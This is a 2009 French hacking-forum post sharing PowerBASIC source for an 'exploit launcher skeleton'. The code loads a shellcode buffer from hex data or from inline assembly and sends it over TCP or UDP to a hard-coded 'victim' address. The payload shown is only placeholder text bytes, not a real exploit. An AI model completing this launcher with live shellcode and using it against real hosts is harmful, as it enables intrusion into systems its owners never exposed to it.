Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: DProtector ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> Code
Sujet précédent :: Sujet suivant  
Auteur Message
Fwank
Membre
Membre

Hors ligne

Inscrit le: 25 Nov 2009
Messages: 100

MessagePosté le: Lun 30 Nov - 17:44 (2009)    Sujet du message: DProtector Répondre en citant

On stocke le shellcode a envoyer directement en hexa ou en ASM.
Donc dans une Fonction PB.




'-----------------------------
'   [D]Protector
'   Exploit Launcher Skeleton
'             Franck BALMER
'             08 Décembre 2007
'
'-----------------------------


#COMPILE EXE
'#RESOURCE "SHELLSENDER.PBR"
#INCLUDE "win32api.inc"




'-----------------------------
' Equates
%SHELLCODELENGTH  = 16
'15 Bytes of Code added by the compiler
'at the begin of each FUNCTION
%FSTARTUPCODELENGTH  = 15
'-----------------------------


'-----------------------------
' Global Variables
GLOBAL Victim$


GLOBAL TcpPort$
GLOBAL UdpPort$
GLOBAL Protocol$
GLOBAL OpCodesBuffer?()
GLOBAL ShellCodeBuffer$


'-----------------------------


FUNCTION ParseCmdLine () AS LONG


END FUNCTION


FUNCTION LoadBufferFromData() AS LONG
LOCAL k&
LOCAL a$


   ShellCodeBuffer$=""
   FOR k&=1 TO DATACOUNT
   a$=READ$(k&)
   ShellCodeBuffer$=ShellCodeBuffer$+CHR$(VAL("&H"+a$))
   NEXT


   DATA 48,65,6C,6C,42,6F,79
   DATA 77,61,73
   DATA 48,65,72,65,20,21


END FUNCTION


FUNCTION AsmFromHell() AS LONG


    'ASM Lines (Yeah !)
    '! NOP
    '! NOP
    '! PUSH AX
    '! POP AX
    'Or DB/DD Lines (Why Not?)
    ! DB &H48,&H65,&H6C,&H6C,&H42,&H6F,&H79 ;Hello
    ! DB &H77,&H61,&H73                     ;From
    ! DB &H48,&H65,&H72,&H65,&H20,&H21      ;HellBoy


END FUNCTION




FUNCTION LoadBufferFromFunc() AS LONG
LOCAL k&
LOCAL a$
LOCAL HellPtr AS LONG


ShellCodeBuffer$=""
HellPtr = CODEPTR(AsmFromHell)
'The for Loop is for post-patch of code
FOR k&=0 TO %SHELLCODELENGTH-1
    OpCodesBuffer?(k&)=PEEK(HellPtr+%FSTARTUPCODELENGTH+k&)
    a$=CHR$(OpCodesBuffer?(k&))
    ShellCodeBuffer$=ShellCodeBuffer$+a$
NEXT
'ShellCodeBuffer$ = PEEK$(HellPtr+%FSTARTUPCODELENGTH, %SHELLCODELENGTH)


END FUNCTION




FUNCTION TcpShellCodeSend() AS LONG
LOCAL VictimAddr&
   HOST ADDR Victim$ TO VictimAddr&
   ERRCLEAR
   TCP OPEN PORT VAL(TcpPort$) AT Victim$ AS #2
   IF ERR THEN
      MSGBOX "Unable to Connect",%MB_ICONERROR,Victim$+":"+TcpPort$+"(TCP)"
      EXIT FUNCTION
   END IF
   ERRCLEAR
   TCP SEND #2,ShellCodeBuffer$
   IF ERR THEN
      MSGBOX "Unable to Send Datas",%MB_ICONERROR,Victim$+":"+TcpPort$+"(TCP)"
   END IF
   CLOSE #2
END FUNCTION


FUNCTION UdpShellCodeSend() AS LONG
LOCAL VictimAddr&
   HOST ADDR Victim$ TO VictimAddr&
   UDP OPEN AS #3
   ERRCLEAR
   UDP SEND #3, AT VictimAddr&,VAL(UdpPort$),ShellCodeBuffer$
   IF ERR THEN
      MSGBOX "Unable to Send Datas",%MB_ICONERROR,Victim$+":"+UdpPort$+"(UDP)"
   END IF
   CLOSE #3
END FUNCTION




FUNCTION PBMAIN () AS LONG


LOCAL i&,j&,k&,l&


DIM OpCodesBuffer?(%SHELLCODELENGTH)


Victim$="192.168.0.10"
TcpPort$="80"
'UdpPort$="137"




CALL LoadBufferFromFunc()
'MSGBOX ShellCodeBuffer$


CALL TcpShellCodeSend()
'CALL UdpShellCodeSend()




END FUNCTION


Revenir en haut
Publicité






MessagePosté le: Lun 30 Nov - 17:44 (2009)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> Code Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com